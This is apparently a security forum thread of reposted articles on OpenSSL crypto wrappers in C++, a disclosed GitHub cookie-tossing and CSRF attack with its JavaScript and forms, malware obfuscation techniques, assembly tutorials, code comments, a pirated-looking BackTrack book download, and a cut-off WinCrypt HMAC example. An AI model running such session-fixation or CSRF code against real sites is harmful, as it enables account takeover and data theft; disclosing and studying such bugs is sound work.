The wrapper also provides a cleanse method that can be used to overwrite secret data in the buffers. This method does not deallocate any memory; it only overwrites the contents of the passed buffer by invoking OPENSSL_cleanse on it.

[h=4]Secure Random Number Generation[/h]

OpenSSL provides a simple interface around the underlying operating system PRNG. This is exposed by the wrapper using the following two functions:

/// Checks if the PRNG is sufficiently seeded.
bool prng_ok();
/// Fills the passed container with random bytes.
template<typename C> void fill_random(C &c);

prng_ok checks if the PRNG has been seeded sufficiently, and the fill_random routine fills any mutable container with random bytes. In the exceptional situation that prng_ok returns false, you must use the OpenSSL seed routines RAND_seed and RAND_add directly to add entropy to the underlying PRNG. Here's how you can use them:

void random_generation()
{
  assert(crypto::prng_ok());           // check PRNG state
  crypto::block buffer;                // use the convenience typedef
  crypto::fill_random(buffer);         // fill it with random bytes
  unsigned char arr[1024];             // use a static POD array
  crypto::fill_random(arr);            // fill it with random bytes
  std::vector<unsigned char> vec(16);  // use a std::vector
  crypto::fill_random(vec);            // fill it with random bytes
}

[h=4]Password Based Symmetric Key Generation[/h]

Symmetric ciphers require secure keys, and one way to generate them is using the fill_random routine seen above. More commonly, however, we'd want to derive the key bits from a user-provided password.
The standard way to do this is the PBKDF2 algorithm, which derives the key bits by iterating over a pseudo-random function with the password and a salt as inputs. The wrapper sets HMAC-SHA-256 as the chosen pseudo-random function and uses a default iteration count of 10000.

/// Derive a key using PBKDF2-HMAC-SHA-256.
template <typename C1, typename C2, typename C3>
void derive_key(C3 &key, const C1 &passwd, const C2 &salt, int c = 10000);

The salt can be any public value that will be persisted between application runs. Repeated invocations of this key derivation routine with the same password and salt value produce the same key bits. This saves us the hassle of securely storing the secret key, assuming that the application can interact with a human user and prompt for the password. Here's a sample invocation of the key derivation routine:

void key_generation()
{
  crypto::block key;                          // 128 bit key
  crypto::block salt;                         // 128 bit salt
  crypto::fill_random(salt);                  // random salt
  crypto::derive_key(key, "password", salt);  // password derived key
  crypto::cleanse(key);                       // clear sensitive data
}

[h=4]Message Digests and Message Authentication Codes[/h]

Cryptographic hashes are compression functions that digest an arbitrarily sized message into a small fingerprint that uniquely represents it. Although they are the building blocks for implementing integrity checks, a hash, by itself, cannot guarantee integrity. An adversary capable of modifying the message is also capable of recomputing the hash of the modified message to send along. For an additional guarantee on the origin we need a stronger primitive, which is the message authentication code (MAC). A MAC is a keyed hash, i.e. a hash that can only be generated by those who possess an assumed shared key. The assumption of secrecy of the key limits the possible origins and thus provides us the guarantee that an adversary couldn't have generated it. MD5 should not be used, and SHA-1 hashes are considered weak and unsuitable for all new applications. The wrapper uses SHA-256 for generating plain digests and HMAC with SHA-256 for MACs.

/// Generates a keyed or a plain cryptographic hash.
class hash: boost::noncopyable
{
public:
  /// A convenience typedef for a 256 bit SHA-256 value.
  typedef boost::array<unsigned char, 32> value;
  /// The plain hash constructor (for message digests).
  hash();
  /// The keyed hash constructor (for MACs).
  template<typename C> hash(const C &key);
  /// Include the contents of the passed container for hashing.
  template <typename C> hash &update(const C &data);
  /// Get the resultant hash value.
  template<typename C> void finalize(C &sha);
  /// ... details ...
};

The default constructor of the class initializes the instance for message digests. The other constructor takes a key as input and initializes the instance for message authentication codes. Once initialized, the data to be hashed can be added by invoking the update method (multiple times, if required). The resulting hash or MAC is a SHA-256 hash (a 256 bit value) that can be extracted using the finalize method. The shorthand typedef hash::value can be used to hold the result. The finalize method also reinitializes the underlying hash context and resets the instance for a fresh hash computation.
Here's how you can use the class:

void message_digest()
{
  crypto::hash md;              // the hash object
  crypto::hash::value sha;      // the hash value
  md.update("hello world!");    // add data
  md.update("see you world!");  // add more data
  md.finalize(sha);             // get digest value
}

void message_authentication_code()
{
  crypto::block key;            // the hash key
  crypto::fill_random(key);     // random key will do (for now)
  crypto::hash h(key);          // the keyed-hash object
  crypto::hash::value mac;      // the mac value
  h.update("hello world!");     // add data
  h.update("see you world!");   // more data
  h.finalize(mac);              // get the MAC code
  crypto::cleanse(key);         // clean sensitive data
}

[h=4]Authenticated Encryption with Associated Data[/h]

Encryption guarantees confidentiality, and authenticated encryption extends that guarantee to guard against tampering of encrypted data. Operation modes like CBC or CTR cannot detect modifications to the ciphertext and will decrypt tweaked data as they would decrypt any other ciphertext. An adversary can use this fact to make calibrated modifications to the ciphertext and end up with the desired plaintext in the decrypted data. The recommended way to guard against such attacks is to use an authenticated encryption mode like the Galois/Counter Mode (GCM).

Authenticated encryption schemes differ from the simpler schemes in that they produce an extra output along with the ciphertext. This extra output is an authentication tag that is required as an input at the time of decryption, where it is used to detect modifications in the ciphertext. Another feature of authenticated encryption is support for associated data. Network protocol messages include data (ex: header fields in packets) that doesn't need to be encrypted but must be guarded against modification in transit. Authenticated encryption schemes allow the addition of such data into the tag computation. So while the adversary can view this data in transit, it cannot be modified without the decryption routine noticing it. The following class provides authenticated encryption with associated data:

/// Provides authenticated encryption (AES-128-GCM).
class cipher : boost::noncopyable
{
public:
  /// Encryption mode constructor.
  template<typename K, typename I> cipher(const K &key, const I &iv);
  /// Decryption mode constructor.
  template<typename K, typename I, typename S> cipher(const K &key, const I &iv, S &seal);
  /// The cipher transformation.
  template<typename I, typename O> cipher &transform(const I &input, O &output);
  /// Adds associated authenticated data.
  template<typename A> cipher &associate_data(const A &aad);
  /// The encryption finalization routine.
  template<typename S> void seal(S &seal);
  /// The decryption finalization routine (throws if the ciphertext is corrupt).
  void verify();
  /// ... details ...
};

The crypto::cipher class has two constructors. The two-argument variant takes a key and an initialization vector (128 bits each) and initializes the instance for encryption. Plaintext can be transformed into ciphertext using the transform method. The GCM mode does not use any padding, so the output ciphertext buffer must be as big as the input plaintext buffer. If there's any associated data that needs to be sent along with the ciphertext, it can be added using the associate_data method. Note that the OpenSSL implementation of GCM requires that associated data is added before the plaintext (i.e. all calls to associate_data must precede all calls to transform).
Once all the data has been added, the seal method must be invoked to obtain the authentication tag (128 bits), which must be sent along with the ciphertext. The three-argument constructor takes a key, an IV and the encryption seal as inputs and initializes the instance for decryption. Ciphertext can then be transformed to plaintext using the transform method (after adding any associated data using the associate_data method). Before using the plaintext, the verify method must be invoked to detect any tampering in the ciphertext or associated data. If all is well the method silently returns; however, if the seal does not match the expected tag value, an exception is raised and the decrypted plaintext must be rejected. The following sample shows the usage:

void authenticated_encrypt_decrypt()
{
  crypto::block iv;                            // initialization vector
  crypto::block key;                           // encryption key
  crypto::block seal;                          // container for the seal
  crypto::fill_random(iv);                     // random initialization vector
  crypto::fill_random(key);                    // random key will do (for now)
  unsigned char date[] = {14, 1, 13};          // associated data
  std::string text("can you keep a secret?");  // message (plain-text)
  std::vector<unsigned char> ciphertext(text.size());
  {
    crypto::cipher cipher(key, iv);            // initialize cipher (encrypt mode)
    cipher.associate_data(date);               // add associated data first
    cipher.transform(text, ciphertext);        // do transform (i.e. encrypt)
    cipher.seal(seal);                         // get the encryption seal
  }
  std::vector<unsigned char> decrypted(ciphertext.size());
  {
    crypto::cipher cipher(key, iv, seal);      // initialize cipher (decrypt mode)
    cipher.associate_data(date);               // add associated data first
    cipher.transform(ciphertext, decrypted);   // do transform (i.e. decrypt)
    cipher.verify();                           // check the seal
  }
  crypto::cleanse(key);                        // clear sensitive data
}

That completes the list of primitives we started off with. There's more to be done, in particular some primitives that use public-key cryptography, but I'll leave that for some other day.

© 2013 Aldrin D'Souza

Sursa: Cryptographic Primitives in C++
  11. [h=3]Hacking Github with Webkit[/h]

Personal: EgorHomakov.com, Consulting: Sakurity

[h=2]Friday, March 8, 2013[/h]

Previously on Github: XSS, CSRF (my github followers are real, I gained followers using CSRF on bitbucket), access bypass, mass assignments (2 issues reported forever), JSONP leaking, open redirect.....

TL;DR: Github is vulnerable to cookie tossing. We can fixate the _csrf_token value using a Webkit bug and then execute any authorized requests.

Github Pages

Plain HTML pages can be served from yourhandle.github.com. These HTML pages may contain Javascript code. Wait. Custom JS on your subdomains is a bad idea:

- If you have document.domain='site.com' anywhere on the main domain, for example xd_receiver, then you can be easily XSSed from a subdomain.
- Surprise, Javascript code can set cookies for the whole *.site.com zone, including the main website.

[h=2]Webkit & cookies order[/h]

Our browsers send cookies this way:

Cookie:_gh_sess=ORIGINAL; _gh_sess=HACKED;

Please keep in mind that the original _gh_sess and the dropped _gh_sess are two completely different cookies! They only share the same name. Also there is no way to figure out which one is Domain=github.com and which is Domain=.github.com. Rack (a common interface for ruby web applications) uses the first one:

cookies.each { |k,v| hash[k] = Array === v ? v.first : v }

Here's another thing: Webkit (Chrome, Safari, and the new guy, Opera) sends cookies ordering them not by Domain (Domain=github.com must go first), and not even by httpOnly (they should go first, obviously). It orders them by creation time (I might be wrong here, but this is how it looks).

First of all let's have a look at the HACKED cookie. PROTIP — save it as decoder.rb and decode sessions faster:

require 'uri'
require 'base64'
p Marshal.load(Base64.decode64(URI.decode(gets.split('--').first)))

ruby decoder.rb
BAh7BzoPc2Vzc2lvbl9pZCIlNWE3OGE0ZmEzZDgwOGJhNDE3ZTljZjI5ZjI1NTg4NGQ6EF9jc3JmX3Rva2VuSSIxU1QvNzR6Z0h1c3Y2Zkx3MlJ1L29rRGxtc2J5OEd3RVpHaHptMFdQM0JTND0GOgZFRg%3D%3D--06e816c13b95428ddaad5eb4315c44f76d39b33b
{:session_id=>"5a78a4fa3d808ba417e9cf29f255884d", :_csrf_token=>"ST/74zgHusv6fLw2Ru/okDlmsby8GwEZGhzm0WP3BS4="}

On a subdomain we create _gh_sess=HACKED; Domain=.github.com and then window.open('https://github.com').

Browser sends: Cookie:_gh_sess=ORIGINAL; _gh_sess=HACKED;
Server responds: Set-Cookie:_gh_sess=ORIGINAL; httponly ....

This made our HACKED cookie older than the freshly received ORIGINAL cookie. Repeat the request: window.open('https://github.com').

Browser sends: Cookie: _gh_sess=HACKED; _gh_sess=ORIGINAL;
Server responds: Set-Cookie:_gh_sess=HACKED; httponly ....

Voila, we fixated it in the Domain=github.com httponly cookie. Now both the Domain=.github.com and Domain=github.com cookies have the same HACKED value. Destroy the dropped cookie, and the mission is accomplished:

document.cookie='_gh_sess=; Domain=.github.com;expires=Thu, 01 Jan 1970 00:00:01 GMT';

Initially I was able to break login (500 error for every attempt). I had some fun on twitter. Github staff banned my repo. Then I figured out how to fixate "session_id" and "_csrf_token" (they never get refreshed if already present). It will make you a guest user (logged out), but after logging in the values will remain the same.

[h=2]Steps:[/h]

Let's choose our target. We discussed the XSS-privileges problem on twitter a few days ago. Any XSS on github can do anything: e.g. open source or delete a private repo. This is bad, and the Pagebox technique or domain-splitting would fix this. We don't need XSS now since we fixated the CSRF token.
(A CSRF attack is almost as serious as XSS. The main advantage of XSS is that it can read responses; CSRF is write-only.) So we would like to open source github/github, thus we need a guy who can technically do this. His name is the Githubber.

I send an email to the Githubber: "Hey, check out the new HTML5 puzzle! http://blabla.github.com/html5_game". The Githubber opens the game and it executes the following javascript — replacing his _gh_sess with HACKED (session fixation):

document.cookie='_gh_sess=BAh7BzoPc2Vzc2lvbl9pZCIlNWE3OGE0ZmEzZDgwOGJhNDE3ZTljZjI5ZjI1NTg4NGQ6EF9jc3JmX3Rva2VuSSIxU1QvNzR6Z0h1c3Y2Zkx3MlJ1L29rRGxtc2J5OEd3RVpHaHptMFdQM0JTND0GOgZFRg%3D%3D--06e816c13b95428ddaad5eb4315c44f76d39b33b;Domain=.github.com;';
x=window.open('https://github.com/');
setTimeout(function(){
  x2=window.open('https://github.com/');
},3000);
setTimeout(function(){
  x.close() && x2.close();
  document.cookie='_gh_sess=; Domain=.github.com;expires=Thu, 01 Jan 1970 00:00:01 GMT';
  //_csrf_token is ST/74zgHusv6fLw2Ru/okDlmsby8GwEZGhzm0WP3BS4=
  //insert <script src="/done.js"> every 1 second
},10000);
done=function(v){
  if(v){
    //make repo private again
  }else{
    //keep trying to open source
  }
}

The HACKED session is user_id-less (a guest session). It simply contains session_id and _csrf_token; no certain user is specified there. So the Game asks him explicitly: please Star us on github (or smth like this) <link>. He may feel confused (a little bit) to be logged out. Anyway, he logs in again. The user_id in the session belongs to the Githubber, but the _csrf_token is still ours!

Meanwhile, the Evil game inserts <script src=/done.js> every 1 second. It contains done(false) by default — meaning: keep submitting the form to the iframe:

<form target=irf action="https://github.com/github/github/opensource" method="post">
  <input name="authenticity_token" value="ST/74zgHusv6fLw2Ru/okDlmsby8GwEZGhzm0WP3BS4=">
</form>

At the same time, every 1 second I execute on my machine:

git clone git://github.com/github/github.git

As soon as the repo is open sourced my clone request will be accepted. Then I change /done.js to "done(true)". This makes the Evil game submit a similar form and make github/github private again:

<form target=irf action="https://github.com/github/github/privatesource" method="post">
  <input name="authenticity_token" value="ST/74zgHusv6fLw2Ru/okDlmsby8GwEZGhzm0WP3BS4=">
</form>

The Githubber replies: "Nice game" and doesn't notice anything (github/github was open sourced for a few seconds and I cloned it). Oh, and his CSRF token is still ST/74zgHusv6fLw2Ru/okDlmsby8GwEZGhzm0WP3BS4=. Forever. (Only a cookies reset will update it.) btw i don't like how cookies work.

Fast fix — now github expires the Domain=.github.com cookie if 2 _gh_sess cookies were sent on https://github.com/*. It kills HACKED just before it becomes older than ORIGINAL. A proper fix would be using githubpages.com or another separate domain. Blogger uses blogger.com as the dashboard and blogspot.com for blogs.

Last time I promised to publish an OAuth security insight. This time I promise to write Webkit (in)security tips in a few weeks. There are some WontFix issues I don't like (related to privacy).

P.S. I reported the fixation issue privately only because I'm a good guy and was in a good mood. Responsible disclosure is way more profitable with other websites, when I get a bounty and can afford at least a beer. Perhaps tumblr has a similar issue. I didn't bother to check.

Posted by Egor Homakov at 8:33 PM

Sursa: Egor Homakov: Hacking Github with Webkit
  12. Some dark corners of C
A presentation that every C programmer should see: https://docs.google.com/presentation/d/1h49gY3TSiayLMXYmRMaAEMl05FaJ-Z6jDOWOz3EsqqQ/preview?usp=sharing&sle=true#slide=id.gaf50702c_0153
  13. Practical x64 Assembly and C++ Tutorials
All videos by WhatsACreel:
1. (10:48) - 1,127 views
2. (9:19) Intro, briefly how to call x64 ASM from C++ - 14,821 views
3. (11:33) Integer data types so we're all on the same page - 3,242 views
4. (9:25) Intro to Registers, the 8086 - 3,180 views
5. (7:59) This one is about the 386 and 486 register sets - 2,190 views
6. (12:01) Finally we get to our modern x64 register set - 2,334 views
7. (13:13) We'll look at a few useful instructions today - 2,539 views
8. (11:58) This one is about the important debugging windows in Visual Studio 2010 Express - 4,492 views
9. (12:28) Today we'll look at Jumps, Labels and Comparing operands - 2,077 views
10. (11:41) This one is how to pass integer parameters via the registers and return them in RAX - 2,229 views
11. (13:20) Some instructions for performing boolean logic - 1,835 views
12. (14:39) Pointers, Memory and the Load Effective Address Instruction - 2,052 views
13. (9:18) Planning prior to programming a small but useful algorithm to Zero an array - 1,913 views
14. (10:12) This is the programming of the algorithm we went through above - 1,993 views
15. (11:56) Intro to reserving space in the data segment - 1,438 views
16. (12:57) This one is about 4 shift instructions, SHL, SHR, SAL and SAR - 2,362 views
17. (13:54) We'll look at the rather strange double precision shifts SHLD and SHRD - 1,140 views
18. (13:31) Some rotate instructions, ROL, ROR, RCL and RCR - 1,528 views
19. (20:32) The Multiplication and Division instructions - 1,885 views
20. (19:04) Flags register and conditional moves and jumps - 1,724 views
21. (16:50) Addressing modes from registers and immediates to SIB pointers - 1,775 views
22. (16:04) Intro to image processing - 1,821 views
23. (19:43) This is the C++ image processing one - 2,455 views
24. (23:41) This is C++ adjust brightness - 1,346 views
25. (13:14) This is the Assembly version of the adjust brightness algorithm - 746 views
26. (23:51) This is the Assembly version of the adjust brightness algorithm - 1,136 views
27. (22:32) Introduction to the stack - 3,216 views
28. (17:42) Calling a C++ function from ASM - 1,498 views
29. (31:39) Intro to the rather daunting stack frame - 2,416 views
30. (16:26) The test instruction is an AND but doesn't set the answer in op1 - 956 views
31. (18:18) Testing single bits from a bit array - 893 views
32. (14:47) Many little misc. instructions - 1,046 views
33. (19:40) Three tutorials on the string instructions - 779 views
34. (17:10) Three tutorials on the string instructions - 598 views
35. (10:54) Three tutorials on the string instructions - 719 views
36. (17:04) This one is on the SETcc instructions which set bytes to 1 or 0 based on a condition - 505 views
37. (17:39) We will spend some time now looking at a few algorithms for practice, this one's FindMax(int*, int) - 538 views
38. (21:26) This one is the Euclidean Algorithm - 710 views
39. (12:18) We've finally made it through most of the regular x86 instruction set, now for something completely different - 718 views
40. (24:11) Introducing the CPUID instruction - 1,315 views
41. (21:36) A general intro to MMX and a couple of the instructions - 801 views
42. (18:46) The addition and subtraction instructions in MMX - 691 views
43. (17:51) Multiplication instructions in MMX - 765 views
44. (20:33) Bit shifting in MMX - 904 views
45. (20:32) - 543 views
46. (20:15) - 590 views
47. (21:23) - 569 views
48. (13:28) - 741 views
49. (19:45) - 911 views
50. (29:39) - 961 views
51. (17:18) - 459 views
52. (30:08) - 342 views
53. (33:59) - 596 views
54. (21:10) - 411 views
55. (12:40) - 239 views
56. (12:32)
Playlist: http://www.youtube.com/playlist?list=PL0C5C980A28FEE68D
  14. [h=1]Yes, your code does need comments.[/h]
I imagine that this post is going to draw the ire of some. It seems like every time I mention this on Twitter or anywhere else, there is always some pushback from people who think that putting comments in your code is a waste of time. I think your code needs comments, but so we have a mutual understanding, let's qualify that.

def somefunction(a, b):
    # add a to b
    c = a + b
    # return the result of a + b
    return c

I understand this is a contrived example, but this is the comment trap that new developers get caught in. These types of comments really aren't useful to anyone. Peppering the code that you just wrote with excessive comments, especially when it is abundantly clear what the code is doing, is the least useful type of comment you can write.

"Code is far better at describing what code does than English, so just write clear code."

This is usually the blowback you get from comments like the ones above. I don't disagree: programming languages are definitely more precise than English. What I don't agree with is the idea that if the code is clear and understandable, then comments are unneeded or don't have a place in modern software development.

So knowing this, what kind of comments am I advocating for? I'm advocating for comments as documentation: comments that explain what a complex piece of code does, and most importantly what an entire function or class does and why it exists in the first place.

So what is a good example of the kind of documentation I am talking about? I think Zed Shaw's Lamson is a fantastic example of this. Here is a code excerpt:

class Relay(object):
    """
    Used to talk to your "relay server" or smart host, this is probably the most
    important class in the handlers next to the lamson.routing.Router.
    It supports a few simple operations for sending mail, replying, and can log
    the protocol it uses to stderr if you set debug=1 on __init__.
    """

    def __init__(self, host='127.0.0.1', port=25, username=None, password=None,
                 ssl=False, starttls=False, debug=0):
        """
        The hostname and port we're connecting to, and the debug level (default to 0).
        Optional username and password for smtp authentication.
        If ssl is True smtplib.SMTP_SSL will be used.
        If starttls is True (and ssl False), smtp connection will be put in TLS mode.
        It does the hard work of delivering messages to the relay host.
        """
        self.hostname = host
        self.port = port
        self.debug = debug
        self.username = username
        self.password = password
        self.ssl = ssl
        self.starttls = starttls
        ...

This code snippet is from https://github.com/zedshaw/lamson/blob/master/lamson/server.py. You can poke around the lamson code and see some good-looking Python code, but also some usefully documented code.

[h=2]So hold on. Why are we writing comments?[/h]
Why are we writing comments if we write clean, understandable code? Why do we need to explain what classes and functions do if the code is "clear" and easy to understand? In my opinion, we write comments to capture intent. Comments are the only way to capture the intent of the code at the time of writing. Looking at a block of code only allows you to understand its intent at that moment in time, which may be very different from the intent at the time of its original writing.

[h=2]Writing comments captures intent.[/h]
Writing comments captures the original meaning of the code. Python has docstrings for this; other languages have comparable options. What is so good about docstring-type comments?
In conjunction with unambiguous class and function names, they can easily describe the original intent of your code. Why is capturing the original intent of your code important?
- It allows a developer, at a glance, to look at a piece of code and know why it exists.
- It reduces situations where a piece of code's original intent isn't clear, so it gets modified and leads to unintended regressions.
- It reduces the amount of context a developer must hold in his/her mind to solve any particular problem that may be contained in a piece of code.
Writing comments to capture intent is like writing tests to prove that your software does what is expected.

[h=2]Where do we go from here?[/h]
The first step is to realize that the documentation/comments accompanying a piece of code can be just as important as the code itself, and need to be maintained as such. Just like code can become stale if you don't keep it updated, so can comments. If you update some code, you must update the accompanying comments/documentation, or they become useless and can lead to more developer error than having no comments at all. So we have to treat comments and documentation as first-class citizens.

Next we have to agree on what is important to comment on in your code, and how to structure your code to make your use of comments most effective. Most of this relies on your own judgement, but we can cover most issues with some steadfast rules:
- Never name your classes and functions ambiguously.
- Always use inline comments on code blocks that are complicated or may appear unclear.
- Always use descriptive variable names.
- Always write comments describing the intent or reason why a piece of code exists.
- Always keep comments up to date when editing commented code.

As you can see from the points above, code as documentation and comments as documentation are not mutually exclusive. Both are necessary to create readable code that is easily maintained by you and future maintainers.

Source: Yes, your code does need comments. - Mike Grouchy
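To make the post's rules concrete, here is a minimal sketch (the function and its backstory are invented for illustration) of the contrived opener redone so the docstring records intent instead of narrating the code:

def apply_discount(price, rate):
    """Return the price after the seasonal discount, rounded to cents.

    This exists because the storefront and the nightly invoicing job
    must round identically; change the rounding here and in billing together.
    """
    return round(price * (1 - rate), 2)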
  15. BackTrack 5 Cookbook
Over 80 recipes to execute many of the best known and little known penetration testing aspects of BackTrack 5
Willie Pritchett, David De Smet

- Learn to perform penetration tests with BackTrack 5
- Nearly 100 recipes designed to teach penetration testing principles and build knowledge of BackTrack 5 tools
- Provides detailed step-by-step instructions on the usage of many of BackTrack's popular and not-so-popular tools

In Detail
BackTrack is a Linux-based penetration testing arsenal that helps security professionals perform assessments in a purely native environment dedicated to hacking. BackTrack is a distribution based on the Debian GNU/Linux distribution, aimed at digital forensics and penetration testing use. It is named after backtracking, a search algorithm.

"BackTrack 5 Cookbook" provides you with practical recipes featuring many popular tools that cover the basics of a penetration test: information gathering, vulnerability identification, exploitation, privilege escalation, and covering your tracks. The book begins by covering the installation of BackTrack 5 and setting up a virtual environment in which to perform your tests. We then dip into recipes involving the basic principles of a penetration test, such as information gathering, vulnerability identification, and exploitation. You will further learn about privilege escalation, radio network analysis, Voice over IP, password cracking, and BackTrack forensics. "BackTrack 5 Cookbook" will serve as an excellent source of information for the security professional and novice alike.

What you will learn from this book:
- Install and set up BackTrack 5 on multiple platforms
- Customize BackTrack to fit your individual needs
- Exploit vulnerabilities found with Metasploit
- Locate vulnerabilities with Nessus and OpenVAS
- Provide several solutions to escalate privileges on a compromised machine
- Learn how to use BackTrack in all phases of a penetration test
- Crack WEP/WPA/WPA2 encryption
- Learn how to monitor and eavesdrop on VoIP networks

Download: https://cdn.anonfiles.com/1358842982481.pdf
Source: Data 4 Instruction: BackTrack 5 Cookbook
  16. Obfuscation: Malware's best friend
By Joshua Cannell, March 8, 2013, in Malware Intelligence

Here at Malwarebytes, we see a lot of malware. Whether it's a botnet used to attack web servers or ransomware stealing your files, much of today's malware wants to stay hidden during infection and operation to prevent removal and analysis. Malware achieves this using many techniques to thwart detection and analysis, some examples of which include using obscure filenames, modifying file attributes, or operating under the pretense of legitimate programs and services. In more advanced cases, the malware might attempt to subvert modern detection software (e.g. MBAM) to prevent being found, hiding running processes and network connections. The possibilities are quite endless.

Despite advances in modern malware, dirty programs can't hide forever. When malware is found, it needs some additional layers of defense to protect itself from analysis and reverse engineering. By implementing additional protection mechanisms, malware can be more difficult to detect and even more resilient to takedown. Although a lot of tricks are used to hide malware's internals, a technique used in nearly every malware family is binary obfuscation.

Obfuscation (in the context of software) is a technique that makes binary and textual data unreadable and/or hard to understand. Software developers sometimes employ obfuscation techniques because they don't want their programs being reverse-engineered or pirated. Its implementation can be as simple as a few bit manipulations or as advanced as cryptographic standards (e.g. DES, AES). In the world of malware, it's useful to hide the significant words a program uses (called "strings"), because they give insight into the malware's behavior; examples of such strings would be malicious URLs or registry keys. Sometimes the malware goes a step further and obfuscates the entire file with a special program called a packer.

Let's see some practical obfuscation examples used in a lot of malware today.

Scenario 1: The exclusive or operation (XOR)
The exclusive or operation (represented as XOR) is probably the most commonly used method of obfuscation, because it is very easy to implement and easily hides your data from untrained eyes. Consider the following highlighted data.

Obfuscated data is unreadable in its current form.

In its current form, the data is unreadable. But when we apply an XOR value of 0x55, we see something else entirely.

An XOR operation using 0x55 reveals a malicious URL.

Now we have our malicious URL. It looks like this malware contacts "http://tator1157.hostgator.com" to retrieve the file "bot.exe". This form of obfuscation is typically very easy to defeat. Even if you don't have the XOR key, programs exist to cycle through every possible single-byte XOR value in search of a particular string. One popular tool, available on both UNIX and Windows platforms, is XORSearch written by Didier Stevens; it searches for strings encoded in multiple formats, including XOR.

Because malware authors know programs like these exist, they implement tricks of their own to avoid detection. One thing they might do is a two-cycle approach: performing an XOR against the data with one value and then making a second pass with another. A separate (although equally effective) technique is to increment the XOR value in a loop: using the previous example, we could XOR the letter 'h' with 0x55, then the letter 't' with 0x56, and so on. This also defeats common XOR detection programs. A short sketch of both the brute-force search and the rolling-key variant follows below.
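To make Scenario 1 concrete, here is a short Python sketch (mine, not from the original post): it obfuscates the URL above with a single-byte XOR, recovers it by brute force the way XORSearch would, and shows the rolling-key variant that defeats that search:

def xor_single(data, key):
    return bytes(b ^ key for b in data)

blob = xor_single(b"http://tator1157.hostgator.com/bot.exe", 0x55)  # obfuscate

# Brute-force all 256 single-byte keys, looking for a known plaintext marker
for key in range(256):
    if b"http" in xor_single(blob, key):
        print(hex(key), xor_single(blob, key))

def xor_rolling(data, key):
    # increment the key per byte: 'h'^0x55, 't'^0x56, ... defeats single-byte search
    return bytes(b ^ ((key + i) & 0xFF) for i, b in enumerate(data))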
Scenario 2: Base64 encoding
Base64 encoding has been used for a long time to transfer binary data (machine code) over systems that only handle text. As the name suggests, its encoding alphabet contains 64 characters, with the equals sign (=) used as a padding character. The alphabet contains the characters A-Z, a-z, 0-9, + and /. Below is an example of some encoded text representing the string pointing to the svchost.exe file, used by Windows to host services.

Base64 is commonly used in malware to disguise text strings.

While the encoded output is completely unreadable, base64 encoding is easier to identify than a lot of encoding schemes, usually because of its padding character. There are a lot of tools that can perform base64 encode/decode functions, both online and as downloadable programs. Because base64 encoding is so easy to overcome, malware authors usually take things a step further and change the order of the base64 alphabet, which breaks standard decoders and allows for a custom encoding routine that is more difficult to break.

Scenario 3: ROT13
Perhaps the simplest of the three techniques that's commonly used is ROT13. The name comes from "rotate": ROT13 means "rotate by 13". ROT13 uses simple letter substitution to achieve obfuscated output. Let's start by encoding the letter 'a': since we're rotating by thirteen, we count the next thirteen letters of the alphabet until we land at 'n'. That's really all there is to it!

ROT13 uses a simple letter substitution to jumble text.

The image above shows a popular registry key used to list programs that run each time a user logs in. ROT13 can also be modified to rotate a different number of characters, like ROT15. A combined sketch of both encodings follows below.
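Here is a matching Python sketch for Scenarios 2 and 3 (the custom alphabet below is invented for the demo): decoding a shuffled-alphabet Base64, ROT13 of the Run key mentioned above, and a generalized ROT-n for variants like ROT15:

import base64, codecs, string

STD = string.ascii_uppercase + string.ascii_lowercase + string.digits + "+/"
CUSTOM = STD[13:] + STD[:13]  # invented reordering of the alphabet for this demo

def custom_b64decode(s):
    # map the attacker's alphabet back onto the standard one, then decode normally
    return base64.b64decode(s.translate(str.maketrans(CUSTOM, STD)))

enc = base64.b64encode(b"C:\\WINDOWS\\system32\\svchost.exe").decode()
print(custom_b64decode(enc.translate(str.maketrans(STD, CUSTOM))))

# ROT13 of the autorun registry key, plus a generalized ROT-n
print(codecs.decode(r"Fbsgjner\Zvpebfbsg\Jvaqbjf\PheeragIrefvba\Eha", "rot_13"))

def rot_n(s, n):
    out = []
    for c in s:
        if c.isalpha():
            base = ord('A') if c.isupper() else ord('a')
            out.append(chr((ord(c) - base + n) % 26 + base))
        else:
            out.append(c)
    return "".join(out)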
Scenario 4: Runtime packers
In a lot of cases, the entire malware program is obfuscated. This prevents anybody from viewing the malware's code until it is placed in memory, and it is achieved using what's known as a packer. A packer is a piece of software that takes the original malware file and compresses it, making all of the original code and data unreadable. At runtime, a wrapper program takes the packed program and decompresses it in memory, revealing the program's original code.

Packers have been used for a long time for legitimate purposes, some of which include reducing file sizes and protecting against piracy. They help conceal vital program components and deter novice program crackers. Fortunately, we aren't without help when it comes to identifying and unpacking these files. There are many programs available that detect commercial packers and also advise on how to unpack. Some examples of these file scanners are Exeinfo PE and PEiD (no longer developed, but still available for download).

Exeinfo PE is a great tool for detecting common packers.

However, as you might expect, the situation can get more complicated. Malware authors like to create custom packers to prevent less-experienced reverse engineers from unpacking their malware's contents. This approach defeats modern unpacking scripts and forces reversers to manually unpack the file to see what the program is doing. Rarer still, sometimes malware authors will pack their files twice: first with a commercial packer and then with their own custom packer.

Conclusion
While this list of techniques is certainly not exhaustive, hopefully it has provided a better understanding of how malware hides itself in plain sight. Obfuscation is a highly reliable technique for hiding file contents, and sometimes the entire file itself if a packer program is used. Obfuscation techniques are always changing, but rest assured knowing we at Malwarebytes are well aware of this. Our staff has years of experience in fighting malware, and goes to great lengths to see what malicious files are really doing. Bring it on, malware. Do your worst!

Source: Obfuscation: Malware's best friend | Malwarebytes Unpacked
  17. [h=1]HMAC MD5/SHA1[/h]
Author: [h=3]RosDevil[/h]
Hi people, this is a correct usage of Windows' WINCRYPT APIs to perform HMAC-MD5/SHA1. The examples shown on MSDN aren't correct and have some bugs, so I decided to share a correct example.

#include <iostream>
#include <cstdio>
#include <cstring>
#include <tchar.h>
#include <windows.h>
#include <wincrypt.h>

#ifndef CALG_HMAC
#define CALG_HMAC (ALG_CLASS_HASH | ALG_TYPE_ANY | ALG_SID_HMAC)
#endif
#ifndef CRYPT_IPSEC_HMAC_KEY
#define CRYPT_IPSEC_HMAC_KEY 0x00000100
#endif

#pragma comment(lib, "advapi32.lib") // CryptAcquireContext and friends live here

using namespace std;

char * HMAC(char * str, char * password, DWORD AlgId);

// PLAINTEXTKEYBLOB layout: header, key length, then the raw key bytes
typedef struct _my_blob {
    BLOBHEADER header;
    DWORD len;
    BYTE key[0];
} my_blob;

int main(int argc, _TCHAR* argv[])
{
    char * hash_sha1 = HMAC("ROSDEVIL", "password", CALG_SHA1);
    char * hash_md5 = HMAC("ROSDEVIL", "password", CALG_MD5);
    cout << "Hash HMAC-SHA1: " << hash_sha1 << " ( " << strlen(hash_sha1) << " )" << endl;
